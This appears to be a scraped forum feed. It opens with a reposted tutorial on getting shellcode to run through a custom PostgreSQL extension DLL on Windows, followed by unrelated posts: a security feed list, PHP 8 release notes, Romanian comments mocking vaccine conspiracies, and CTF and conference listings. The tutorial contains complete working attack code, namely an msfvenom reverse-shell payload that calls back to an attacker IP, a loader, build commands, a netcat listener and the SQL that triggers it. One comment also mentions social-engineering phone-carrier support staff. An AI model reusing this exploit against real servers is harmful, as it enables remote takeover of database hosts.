Nytro

POSTGRESQL EXTENSION SHELLCODE EXECUTION Root InfoSec Windows Postgresql Extension Shellcode Execution Postgresql allows us to create our own user defined functions (UDF) from existing or custom extensions (as DLL files on Microsoft Windows). This is particularly useful when it comes to gain access to a target system when we control SQL execution flow and have sufficient privilege to create and user Postgres UDF. REQUIREMENTS LOCAL POSTGRESQL SERVER To maximise the chance to succeed executing our own Postgres extension, it is very important to extract the version of target Postgres server and install the exact same version in your own lab environment. In our case, we are targeting a PostgreSQL 13.1 64-bit It is also important to note the target Postgres architecture (in our case x86-64). Depending on target architecture we will need to compile our custom extension wether in 32 or 64bit. Executing a 32bit extension in a 64bit instance of Postgres will simply fail. It is naturally the same with a 64bit extension in a 32bit instance of Postgres. Installing Postgresql will also automatically extract required C header files to build our own extension. This is why it is so important to compile our custom extension in an environment with the exact same version of Postgresql server available since those files might change between two version. Those C header files are generally located at this path : C:\Program Files\PostgreSQL\<pg_version>\include Where pg_version is the version of Postgresql we want to target (in our case, version 13.x). C COMPILER To compile our custom extension, we will need to have a C compiler installed and supporting the correct architecture. We will use MinGw C 64bit compiler that comes as an extra package of Cygwin. Feel free to use and adapt the build process with your favorite C compiler / IDE. CREATE A VERY BASIC EXTENSION. minimal_extension.c #include "postgres.h" // Required postgres C header file #include "fmgr.h" // Required postgres C header file #ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; // Used by postgresql to recognize a valid extension #endif /* Define which functions can be used by postgres. In our case just "custom_func" */ PGDLLEXPORT Datum custom_func(PG_FUNCTION_ARGS); PG_FUNCTION_INFO_V1(custom_func); /* Our custom function code goes there */ Datum custom_func(PG_FUNCTION_ARGS) { OutputDebugStringW(L"Hello from postgresql extension."); PG_RETURN_VOID(); } Above code is the minimal required code to build our own Postgresql extension. On Microsoft Windows, Postgresql extension are compiled as DLL files. We can compile our extension code using the following command: x86_64-w64-mingw32-gcc.exe minimal_extension.c -c -o minimal_extension.o -I "C:\Program Files\PostgreSQL\13\include" -I "C:\Program Files\PostgreSQL\13\include\server" -I "C:\Program Files\PostgreSQL\13\include\server\port\win32" C:\Program Files\PostgreSQL\13\include C:\Program Files\PostgreSQL\13\include\server C:\Program Files\PostgreSQL\13\include\server\port\win32 Are required postgresql header files locations. We then can build our DLL file using the following command: x86_64-w64-mingw32-gcc.exe -o minimal_extension.dll -s -shared minimal_extension.o -Wl,--subsystem,windows LOAD EXTENSION We will use the PgAdmin tool to run our custom SQL queries to load and test our custom extension. CREATE OR REPLACE FUNCTION custom_func() RETURNS void AS '<extension_path>', 'custom_func' LANGUAGE C STRICT; Where extension_path is the location of our DLL file. A little popup should say that query were successfully executed. CALL EXTENSION FUNCTION First let’s open a privileged DebugView.exe instance to catch our OutputDebugString. Be sure to have Capture > Capture Global Win32 option checked. We can now call our newly registered function from our custom extension using a basic SELECT statement. SELECT custom_func(); We should now see our message in DebugView window. Success! We are now free to replace our basic OutputDebugString with more complex code and take advantage of Postgres extension to gain privileged access on a target machine. UNREGISTER FUNCTION During development process, we will often need to patch our custom extension. Our DLL file is currently loaded by postgres process so the file is locked and can’t be patched as is. We can simply first unregister our custom function declaration using the following SQL statement DROP FUNCTION IF EXISTS custom_func; Then open our Microsoft Service manager and restart postgres service. This will unlock our DLL file. SHELLCODE EXECUTION We now know how to create and execute code from custom extension through postgres extension capabilities. We will now create a new version of our extension to execute shellcode payloads. We will use Metasploit Msfvenom to create our payload. And use a classic technique to copy our payload to a new allocated memory region and create a new thread starting code execution at this new location. This will prevent our current postgres thread to hang when executing payload. —warning— Don’t forget to replace current defined payload with your own version. —end— PgShellcodeExt.c #include "postgres.h" #include "fmgr.h" #ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif // msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=172.16.20.6 LPORT=443 -f c -v payload unsigned char payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33" "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00" "\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xac\x10\x14\x06\x41\x54" "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c" "\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff" "\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2" "\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48" "\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99" "\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63" "\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57" "\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44" "\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6" "\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff" "\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5" "\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff" "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48" "\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13" "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"; PGDLLEXPORT Datum shellcode(PG_FUNCTION_ARGS); PG_FUNCTION_INFO_V1(shellcode); Datum shellcode(PG_FUNCTION_ARGS) { /* Classic method to load a shellcode in memory and create/execute a new thread at it location. */ LPVOID p = VirtualAlloc(NULL, sizeof(payload), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE); DWORD dwThreadId; MoveMemory(p, &payload, sizeof(payload)); CreateThread(NULL, 0, p, NULL, 0, &dwThreadId); PG_RETURN_VOID(); } x86_64-w64-mingw32-gcc.exe PgShellcodeExt.c -c -o PgShellcodeExt.o -I "C:\Program Files\PostgreSQL\13\include" -I "C:\Program Files\PostgreSQL\13\include\server" -I "C:\Program Files\PostgreSQL\13\include\server\port\win32" x86_64-w64-mingw32-gcc.exe -o PgShellcodeExt.dll -s -shared PgShellcodeExt.o -Wl,--subsystem,windows We can now open a new local netcat listener on our attacker’s machine. user@local:$ nc -lvp 443 And then register and trigger our custom extension with following SQL statement (still from our PgAdmin instance) -- Register new function CREATE OR REPLACE FUNCTION shellcode() RETURNS void AS 'C:\Users\Jean-Pierre LESUEUR\Desktop\PgShellcodeExt\PgShellcodeExt.dll', 'shellcode' LANGUAGE C STRICT; -- Trigger function SELECT shellcode(); -- Delete function DROP FUNCTION IF EXISTS shellcode; Checking our local netcat listener reveal we’ve successfully received our reverse shell. CONCLUSION This paper demonstrated how to take advantage of postgres extension capabilities to execute shellcode. But it will need more efforts in production to be usable. First you will need to find a way to execute SQL queries as a privileged postgres user (required to implement new extensions). Most of the time from a SQL injection present in a vulnerable application. Secondly, you will need to find a way to transmit your DLL extension to target machine: Additional SQL Statements File Uploads Shares etc… Feel free to port this example to another operating system (ex: Linux). Most of the thing are very similar. We will probably post another paper on this subject for Linux. WRITTEN THE NOV. 27, 2020, 11:14 A.M. BY JEAN-PIERRE LESUEUR UPDATED: 2 DAYS, 3 HOURS AGO. Sursa: https://www.phrozen.io/resources/paper/41df297b-cfe3-43ec-88e8-0686e5548dd5

Awesome Security Feeds A semi-curated list of Security Feeds You can import the opml file to a service like Feedly Below a list of all the sites, feel free to suggest others! Must Read TorrentFreak Schneier on Security Darknet Troy Hunt's Blog Securelist Dan Kaminsky's Blog ZDNet | The Ed Bott Report RSS Daniel Miessler Infosec Reactions Malwarebytes Labs Security Research & Defense Have I Been Pwned latest breaches Malware Must Die! enigma0x3 SkullSecurity News – – WordPress.org Conferences & Video Paul's Security Weekly Defcon SecurityTube.Net media.ccc.de - NEWS Vimeo / Offensive Security’s videos Irongeek's Security Site Italiano dirittodellinformatica.it - Rivista telematica su diritto e tecnologia oneOpenSource Securityinfo.it D3Lab Trin Tragula 0x2A ICT Security Magazine Andrea Draghetti VoidSec Luca Mercatanti WebSecurity IT Over Security Zeus News - Olimpo Informatico Autistici Dark Space Blogspot Yoroi Warning Archive Feed Baty's Base F-Hack » Feed Arturo Di Corinto Il Disinformatico Cyber Division CyberDifesa.it cavallette TG Soft Software House - News Codice Insicuro, blog di Cyber Security, sviluppo sicuro, code review e altro. Cyber Security IT Service Management News TS-WAY Stories by theMiddle on Medium Fabio Natalucci Post LastKnight.com Feed PANOPTICON ESCAPE CyberIntelligence CyberCrime & Doing Time Cyber Strategies for a World at War Automating OSINT Blog bellingcat IntelTechniques Red Teaming - Red Teams Uncommon Sense Security JestersCourt Silendo Krypt3ia Security Intelligence and Big Data reddit Information Security Training Resources /r/netsec - Information Security News & Discussion Deep Web Reverse Engineering Blackhat Library Computer Forensics Your Hacking Tutorial by Zempirians RedTeam Security Social Engineering Information Security netsecstudents: Subreddit for students studying Network Security and its related subjects Blog Cybrary Joe's Security Blog Kevin Chung Randy Westergren evilsocket Webroot Blog shell-storm BugCrowd ZeroSec - Adventures In Information Security DigiNinja SkullSecurity l.avala.mp's place HighOn.Coffee Max Justicz Null Byte Krebs on Security BREAKDEV EFF ProtonMail Blog SANS Internet Storm Center, InfoCON: green NetSPI Blog 0x00sec - The Home of the Hacker - Monthly top topics Open Web Application Security Project Bromium 🔐Blog of Osanda Coding Horror Application Security Research, News, and Education Blog xorl %eax, %eax TaoSecurity Blog Updates from the Tor Project thinkst Thoughts... David Longenecker JestersCourt Technical phillips321.co.uk Add / Xor / Rol Intercept the planet! @Mediaservice.net Technical Blog AlienVault Labs Blog MalwareDomainList updates winscripting.blog PenTest Labs Brett Buerhaus Jack Hacks 0x27.me The Exploit Laboratory Linux Audit CERT Blogs Forcepoint markitzeroday.com Down the Security Rabbithole Blog - Supplemental Research Blogs Feed NotSoSecure CYBER ARMS Blog – LookingGlass Cyber Solutions Inc. Cofense anti-virus rants Hackw0rm.net Attack and Defense Labs AverageSecurityGuy Shodan Blog BalalaikaCr3w TrustedSec CyberWatch JUMPSEC | CREST Accredited Dave Waterson on Security Shell is Only the Beginning MDSec dotcppfile's Blog #_shellntel binary foray Blog HolisticInfoSec™ Secureworks Blog NETRESEC Network Security Blog The Honeynet Project blogs Pending Technical Errata Security Cylance Blog Red Hat Security Inspired-Sec Furoner.CAT 0xAA - Random notes on security Fzuckerman© HIPAA News, Web & Email Security Tips & News - Plus More | LuxSci Bromium Labs The Ethical Hacker Network Hacking and security The Grymoire Active questions tagged linux - Information Security Stack Exchange /dev/random 0x3a - Security Specialist and programmer by trade Security Research & Defense US-CERT Alerts Strategic Cyber LLC Rapid7 Blog VulnHub ~ Entries Shell is coming ... Lastline Blog Maltego MalwareTech Hacking Articles Microsoft Security Infosec Resources WhiteScope IO Security – Cisco Blogs Unmask Parasites. Blog. TheGeryCorner Imperva Cyber Security Blog Hanno's blog Checkmarx Active Directory Security StopBadware blogs Azeria Labs Pentestmag KernelPicnic Blog - Decent Security SpiderLabs Blog from Trustwave Mogozobo Stealing the Network 4sysops Rhino Security Labs Astr0baby's not so random thoughts _____ rand() % 100; Hakin9 – IT Security Magazine Blog TrendLabs Security Intelligence Blog Appsecco Penetration Testing contagio Security Through Education Blog – WhiteHat Security DEADCODE Javvad Malik Shell is Only the Beginning NetSPI Blog Eric Conrad Andrew Hay Milo2012's Security Blog #!/slash/note Securosis Complete Jump ESP, jump! SerHack – Security research on SerHack – Security researcher Carnal0wnage & Attack Research Blog www.crowdstrike.com/blog harmj0y US-CERT Current Activity Seculert Blog on Breach Detection damsky Black Hills Information Security Mosaic Security Research Sucuri Blog Security Art Work XyliBox Carnal0wnage & Attack Research Blog The Sakurity Blog thepcn3rd - Passion for Infosec | bohops | Real-time communications security on Communication Breakdown - real-time communications security blackMORE Ops Security and risk Qualys Security Blog Securelist Malware Analysis: The Final Frontier myexploit Martin Vigo Common Exploits – Penetration Testing Information RedTeams Corelan Team Cybersecurity Blog PC's Xcetra Support Nat McHugh AppSec-Labs | Application Security gynvael.coldwind//vx.log (en) Blaze's Security Blog Bill Demirkapi’s Blog Infosec Island Latest Articles SANS Institute Security Awareness Tip of the Day Threat Research Cybercrime Magazine Forensic Focus TaoSecurity Security Training Security Zap Wiremask's Feed ExposedBotnets Shell is Only the Beginning SecurityCurrent Posts By SpecterOps Team Members Cheesy Rumbles @D00m3dr4v3n enigma0x3 Posts on malicious.link Hacking Exposed Computer Forensics Blog Volatility Labs Team-Cymru Security Spread Security Basics Cisco Blog » Security Silent Signal Techblog Security on the edge Délimiteur de données sirdarckcat Aditya Agrawal TheHackerBlog Labs PortCullis Fox-IT International blog Lab of a Penetration Tester F-Secure Antivirus Research Weblog HackTips The Life of a Penetration Tester Virus Bulletin's blog Tenable Blog Didier Stevens Oddvar Moe's Blog Google Online Security Blog Sucuri Blog Darknet Yubico Sam Curry F-Secure Antivirus Research Weblog Thoughts on Security Tyranid's Lair Orange Cyberdefense Inspired-Sec Stories by Scott J Roberts on Medium Aditya Agrawal Fortinet Blog Tech Vomit LockBoxx Mozilla Security Blog Blog – NotSoSecure MSitPros Blog CERIAS Combined Feed The World of IT & Cyber Security: ehacking.net BlueKaizen Security Sift KahuSecurity Trend Micro Subliminal Hacking NVISO Labs HACKMAGEDDON Lenny Zeltser Security Christopher Truncer's Website A Few Thoughts on Cryptographic Engineering Project Zero w00tsec I CAN'T HACK IT …OR CAN I? ImperialViolet sploitF-U-N Netwrix Blog | Insights for Cybersecurity and IT Pros RefinePro Knowledge Base for OpenRefine khr@sh#: echo $GREETING Web Security Nibble Security Security Breached Blog Agarri : Sécurité informatique offensive Minded Security Blog Bug Bounty POC Telekom Security Random stuff by yappare Brett Buerhaus FoxGlove Security Noob Ninja! OpnSec WHITE HAT - WRITE UPS - RSS Security Thoughts Nikhil Mittal's Blog mert's blog the world. according to koto Patrik Fehrenbach PortSwigger Blog Hacking Distro BackBox Linux blogs Kali Linux WeakNet Labs DistroWatch.com: News Tails - News Security Tools ToolsWatch.org Network Security™ KitPloit - PenTest Tools! Security News Graham Cluley The Hacker News ThreatPost Security Affairs Trend Micro Simply Security The Register - Security Palo Alto Networks Blog Instapaper: Unread SANS Digital Forensics and Incident Response Blog Dark Reading Sursa: https://github.com/mrtouch93/awesome-security-feed

PHP 8 is now Released! NOVEMBER 27, 2020 / ERIC L. BARNES The PHP development team announced the release of PHP 8 yesterday: PHP 8.0 is a major update of the PHP language. It contains many new features and optimizations including named arguments, union types, attributes, constructor property promotion, match expression, nullsafe operator, JIT, and improvements in the type system, error handling, and consistency. Here is the list of main new features: Union Types Named Arguments Match Expressions Attributes Constructor Property Promotion Nullsafe Operator Weak Maps Just In Time Compilation And much much more… Here are some of the highlights from the announcement: PHP 8 Named arguments // PHP 7 htmlspecialchars($string, ENT_COMPAT | ENT_HTML401, 'UTF-8', false); // PHP 8 // Specify only required parameters, skipping optional ones. // Arguments are order-independent and self-documented. htmlspecialchars($string, double_encode: false); PHP 8 Attributes Instead of PHPDoc annotations, you can now use structured metadata with PHP’s native syntax. // PHP 7 class PostsController { /** * @Route("/api/posts/{id}", methods={"GET"}) */ public function get($id) { /* ... */ } } // PHP 8 class PostsController { #[Route("/api/posts/{id}", methods: ["GET"])] public function get($id) { /* ... */ } } PHP 8 Constructor property promotion Less boilerplate code to define and initialize properties. // PHP 7 class Point { public float $x; public float $y; public float $z; public function __construct( float $x = 0.0, float $y = 0.0, float $z = 0.0, ) { $this->x = $x; $this->y = $y; $this->z = $z; } } // PHP 8 class Point { public function __construct( public float $x = 0.0, public float $y = 0.0, public float $z = 0.0, ) {} } PHP 8 Union types Instead of PHPDoc annotations for a combination of types, you can use native union type declarations that are validated at runtime. // PHP 7 class Number { /** @var int|float */ private $number; /** * @param float|int $number */ public function __construct($number) { $this->number = $number; } } new Number('NaN'); // Ok // PHP 8 class Number { public function __construct( private int|float $number ) {} } new Number('NaN'); // TypeError PHP 8 Nullsafe operator Instead of null check conditions, you can now use a chain of calls with the new nullsafe operator. When the evaluation of one element in the chain fails, the execution of the entire chain aborts and the entire chain evaluates to null. // PHP 7 $country = null; if ($session !== null) { $user = $session->user; if ($user !== null) { $address = $user->getAddress(); if ($address !== null) { $country = $address->country; } } } // PHP 8 $country = $session?->user?->getAddress()?->country; PHP 8 Match expression The new match is similar to switch and has the following features: Match is an expression, meaning its result can be stored in a variable or returned. Match branches only support single-line expressions and do not need a break; statement. Match does strict comparisons. // PHP 7 switch (8.0) { case '8.0': $result = "Oh no!"; break; case 8.0: $result = "This is what I expected"; break; } echo $result; //> Oh no! // PHP 8 echo match (8.0) { '8.0' => "Oh no!", 8.0 => "This is what I expected", }; //> This is what I expected Of course, these are just the highlights. Check out the official release announcement for all the details. Sursa: https://laravel-news.com/php-8

Sunt de acord cu ce zice, nimic nu poate fi 100% sigur indiferent de cati ani de teste s-ar face. Dar nu vad sa zica ca problemele apar din cauza ca se baga microchip-uri in vaccinuri sau ca provoaca autism. Eu la asta ma refeream. Probleme grave pot sa apara si de la pastile iar oamenii baga in ei cu pumnul pastile. Si nu ma refer la pastile "exotice", ci la orice fel de medicament. De aceea pe cam toate prospectele de la medicamente scrie lucruri de genul: "Nu luati daca sunteti alergici la tri-metil-benzeno-cortizol (termen fara sens inventat acum)" si multe alte contraindicatii. @RazvanDC Si eu pot sa zic niste lucruri legate de IT, cum ar fi: "Sistemul de operare Linux/Windows/Mac nu este sigur! Acesta contine un backdoor care ofera toate datele utilizatorilor guvernului american/rus/chinez! Nu mai folositi acest OS, este mai sigur pentru voi!" - As putea zice asta pentru diverse motive, cum ar fi pentru notorietate, sa apar in presa si sa devin vedeta, sau pentru bani, platit de vreuna dintre firmele concurente sau doar la caterinca si informatia sa ajunga mai departe. Ce zic eu ajunge la un medic, ma poate contrazica? Daca am experienta in IT, inseamna ca tot ce zic legat de domeniu e adevarat?

Lasand la o parte teoriile acelea retardate pe care doar analfabetii le pot crede cu chip-uri si mai stiu eu ce, in general vorbind, cred ca de fiecare data cand a aparut o noua tehnologie au aparut astfel de teorii. Am cautat intamplator pe Google si se pare ca 3G era periculos pentru sanatate (cum se zice acum referitor la 5G): https://www.dailymail.co.uk/health/article-198250/3G-mobile-masts-health-risk.html Am auzit acelasi lucru referitor la 4G de asemenea. Cat despre vaccinuri eu nu prea am mai auzit mizeria legata de faptul ca "provoaca autism". Autorul unui studiu fals referitor acest lucru a recunoscut ca a fost platit pentru a-l scrie (de parinti ai unor copii) si e posibil sa fi fost si inchis. Acum e la moda cu chip-urile. Are cineva idee de unde vine asta? Partea amuzanta e ca cei care cred asta sunt tocmai acele persoane care fac umbra pamantului degeaba, cu o inteligenta mult sub medie si fara prea multe realizari in viata. Se pare ca tocmai ei cred ca "marile interese" vor sa ii controleze. Ce sa faca cu ei? Nu stiu, sa ii puna la sapa. Dar pentru asta sunt de ajuns 10E pe zi, nu o tehnologie care nu va exista prea curand.

Foarte interesant articolul. Legat de cele 2 zile: "On January 11, researchers from China published the genetic sequence of the novel coronavirus. Two days later, Moderna's team and NIH scientists had finalized the targeted genetic sequence it would use in its vaccine" Deci o buna parte a problemei fusese deja rezolvata. Din moment ce tehnologia si cunostiintele existau de ani de zile, consider ca se putea "face" vaccinul si in 2 ore. Dar articolul chiar contine lucruri utile. mRNA FTW!

Vaccinul rusesc abia acum e la faza a III-a a testarii. Pfizer/BioNTech au trecut de aceasta faza cand au facut anuntul. E posibil sa fie functionale si vaccinurile chinezesti sau rusesti, problema cu ele e lipsa transparentei, dupa cum ai spus dar si numarul mic de teste efectuate. Desi si sunt complet pro-vaccinare, nici eu nu sunt de acord cu obligativitatea vaccinarii iar singurul motiv il reprezinta numarul mic de teste efectuate. Dar eu unul tot m-as vaccina si as face-o pe Zoom. Nu inteleg ce cifre se bat cap in cap. Nu am citit acel post lung plin de mizerii pentru ca nu voiam sa ma dau cu capul de pereti. Uitati mai jos un text, sa vedem daca il dati mai departe cum dati celelalte mizerii: "Un hacker cunoscut sub pseudoniul de @black_death_c4t a obtinut acces la servere Pfizer si a reusit sa decripteze genomul noului vaccin. Acesta a publicat analiza bio-moleculara a vaccinului pe platforma sa preferata de socializare, PornHub, unde datele sunt inca disponibile. Se pare ca vaccinul contine o substanta necunoscuta pe planeta si singura explicatie o reprezinta faptul ca acest vaccin este conceput de catre extraterestri pentru a prelua controlul omenirii. Cercetatorul doctorand in medicina genetica, doctorand in virusologie, @Nytro, a declarat ca a analizat rezultatele si ca de fapt hackerul era fumat si doar se uita la filme porno. Michael Jackson, medic primar la Universitatea din Kentuky alaturi de Colonelul Sanders au mentionat faptul ca numerele publicate nu sunt reale si ca sursa deceselor o reprezinta omenirea care foloseste prea mult sos de usturoi". Plm, gasiti un text cu niste nume "straine" si alte cacaturi fara logica si il luati de bun.

Engleza e importanta daca vrei o cariera in IT. Aveti aici un tutorial "basic" (adica de baza), pentru incepatori: https://9gag.com/gag/a9ngZ7j

https://arhiblog.ro/actioneaza-vaccinurile-covid/ PS: Articolul respectiv nu va fi citit de prea multa lume. Si oricand am incerca, nu vom reusi. Oamenii sunt prosti. Adica pula mea, Youtube Trending: https://www.youtube.com/feed/trending Cam asta se cauta pe o platforma in care puteti gasi filmulete despre virusuri, vaccinuri sau chiar cum functioneaza o bomba nucleara. E mai usor de inteles Jador sau Tzanca Uraganul.

Din cate citisem, vaccinurile din prezent functioneaza si in privinta mutatiei de la nurci. Dar cu trecerea timpului vor fi probabil mutatii care vor "bypassa" vaccinul. Desi cu noua tehnologie de producere (acel ARN mesager), cred ca se va gasi destul de rapid unul nou. Asa cum se intampla la gripa. De aceea vaccinurile antigripale "moderne" sunt tetravalente - adica acopera 4 tulpini ale virusului gripal.

Noi nu o sa facem niciodata escrow. Nu avem de ce. Fiecare, fie ca vreau sa vanda, fie ca vrea sa cumpere, ca pe OLX, isi asuma responsabilitatea. Noi cerem un minim de 50 de posturi tocmai pentru a stabili un minim nivel de incredere, de a vedea cam "ce poate" un user inainte de a face afaceri cu el. Dar in final, e decizia fiecaruia.

De obicei fac inginerie sociala pe cei de la support de la operatorul GSM, dar e probabil mai simplu asa, ca cei de la support sunt trainuiti pentru astfel de lucruri.

2020-12-05 09:00:00 UTC — 2020-12-07 09:00:00 UTC DefCamp Capture The Flag ( D-CTF) is the most shattering and rebellious security CTF competition in the Central Eastern Europe. Here, the most skilled hackers & IT geeks put their knowledge to the test and compete with the best CFT teams from all over the world to get in the shortlist of best top 10, and later on win the overall D-CTF competition or, die trying. DefCamp Capture the Flag is organised since 2011 with over 10,000 players joined since then in annual multi-staged event for anyone. There is one important rule though – hack before being hacked! Event Summary Format: Jeopardy Play format: Team only Genres: Crypto, Pwning, Reversing, Web, Miscellaneous … Language: English Access: Open / Free for everyone Difficulty: Entry Level - Easy - Medium - Hard - Insane Website: D-CTF Detalii: https://dctf2020.cyberedu.ro/

adragos e un tip foarte bun la CTF-uri. Din cate am inteles, in timpul CTF-ului nostru se mai desfasura un altul, iar unii au mers la acela. Ceva international. Da, suntem romani

Nu se poate din punct de vedere fizic. Exista tehnologii de incarcare "wireless", in general de la distante mici, prin inductie, dar exista si dispozitive care se pot incarca de la undele electromagnetice din camp (e.g. radio). Se poate, tehnologia exista si se foloseste pentru senzori LowPower, dar acea incarcare e EXTREM de mica. Fie telefonul nu arata corect cata baterie are (cel mai probabil), fie (desi cred ca e cam mult) acel APK, daca avea privilegiile necesare, putea schimba in orice procent incarcarea bateriei (doar afisare, nu avea cum sa o incarce).

Am adaugat pe site si link-urile catre Youtube si slide-urile prezentarilor: https://rstcon.com/prezentari/

Ba, din 2001 ni se baga in organism microchip-uri sub pretextul ca sunt FERMENTI ACTTIVI si asta se face LA VEDERE, cum le place masonilor! Uitati aici, se spune CLAR ca acestia sunt introdusi in ORGANISM. @shitshow sper ca faci caterinca.

A, cred ca am auzit si eu, dar sincer, nu am idee de unde vine Cred ca marile interese au vazut parerile impotriva lor pe aici si e un fel de amenintare.

M-am gadit ca ar fi mai practic sa puteti gasi toate prezentarile intr-un singur loc. Playlist Youtube: https://www.youtube.com/playlist?list=PLTaLvwriPW8y9lcJRXy1UdQLfGDbkkBjD Lista prezentărilor RSTCon: 10:00 – 11:00 – RST – Trecut, prezent și viitor Ionuț Popescu (Nytro) – UiPath Romanian Security Team este o comunitate care a luat viață în 2006 și care azi ne aduce împreună. Ce este RST? Ce s-a întamplat în acești 14 ani? De ce merită mai multă atenție? Ce este în prezent această comunitate? Și mai ales, ce viitor are? În această prezentare voi răspunde acestor întrebări și vă voi explica punctul meu de vedere, atât ca persoană cât și ca administrator al comunității. 11:00 – 12:00 – Real World Bitsquatting Attack Ionuț Cernica – iccguard Acest studiu practic se referă la exploatarea comportamentului browserelor moderne în legătură cu încărcarea URL-urilor externe. În research-ul meu studiez problema cu acest comportament al browserelor moderne în combinație cu problema “bit flipping” pentru a demonstra un nou tip de atac într-o manieră legală. 12:00 – 13:00 – Pauza 13:00 – 14:00 – Approaching OT Pentesting from an IT perspective Cosmin Radu – Atos O scurta incursiune în cum se desfășoară un pentest într-un mediu OT (Operational Technology – fabrici, nave maritime, sisteme SCADA, sisteme de control pentru furnizat utilități). Care sunt riscurile și challenge-urile când testezi într-un mediu cu 0 downtime fizic, cu TCP/IP stacks proprietare și nu neaparat bine implementate. Care sunt diferențele dintre recomandările de mitigare dintre mediul IT și OT? 14:00 – 15:00 – How to find and exploit data conversion vulnerabilities in web apps Șerban Bejan – SecureWorks Exportarea datelor în diverse formate (PDF, documente OXML, imagini etc.) este omniprezentă pe web. Voi prezenta cum se poate injecta cod pentru a se ajunge la LFI, SSRF sau execuția de cod JavaScript arbitrar când există funcționalități de conversie. Veți vedea totul în legătură cu pașii necesari pentru a identifica și exploata injecțiile în exporturi și diverse trucuri și sfaturi practice. 15:00 – 16:00 – Introducere în exploituri publice Andrei Barbu – SecureWorks În această prezentare voi acoperi pe scurt ce este o vulnerabilitate, ce este un exploit și voi vorbi despre exploituri publice. Prezentarea va avea și live demo în care voi folosi o versiune outdated de Ubuntu pe care mă voi loga cu un guest account, voi descărca un local exploit pe care-l voi compila și apoi îl voi executa pentru a obține root. 16:00 – 17:00 – Security Evaluation of WordPress Backup Plugins Ionuț Cernica – iccguard Protejarea aplicațiilor web e o sarcină importantă pentru orice companie. WordPress este CMS-ul preferat de către companii. În această prezentare vom discuta de ce WordPress e o aplicație web importantă și necesitatea securizării acesteia. Un alt aspect analizat va fi în legătură cu securitatea plugin-urilor folosite pentru backup create pentru WordPress din punctul de vedere al leak-urilor de date sensibile, un număr de module vulnerabile, cauze ale vulnerabilităților, greșeli comune și impactul acestor vulnerabilități. Bazat pe un plan experimental vom observa potențialul distructiv al acestor plugin-uri de backup pe baza celor mai relevante website-uri din topul primelor 10 milioane de website-uri. 17:00 – 18:00 – Web pentesting – Sfaturi utile Ionuț Popescu – UiPath Cu toții știm ce este un XSS și cum să îl găsim, cel puțin în cazurile mai simple. Dar un penetration test trebuie să acopere mult mai mult de atât. Atenția la detalii este cea care rezultă în “finding-uri”. În această prezentare nu voi veni cu lucruri ieșite din comun dar voi trece printr-o listă de sfaturi utile atunci când faceți un pentest. Lista nu este nici pe departe completă, dar sper să vă ajute. 18:00 – 18:20 – Incheiere Ionuț Popescu – UiPath Ceremonia de încheiere a conferinței și prezentarea rezultatelor concursului CTF (Capture the Flag). Alte informatii legate de conferinta: https://rstcon.com/

De fapt uite cum sta treaba, pentru cei conspirationisti care considera ca se vrea reducerea populatiei: acele persoane cu INTERESE MARI la mijloc publica aceste articole FALSE cum ar fi: 1. Covid nu exista, este o farsa 2. Covid nu este periculos 3. Vaccinurile au chip-uri ... Exact pentru ca oamenii sa creada ca acest Covid nu exista sau ca vaccinurile nu sunt bune, SPECIAL pentru ca lumea sa nu se protejeze de Covid, sa moara si sa scada populatia. Tocmai v-am pus pe masa o teorie a conspiratiei la adresa unei teorii a conspiratie. Conspiraception!

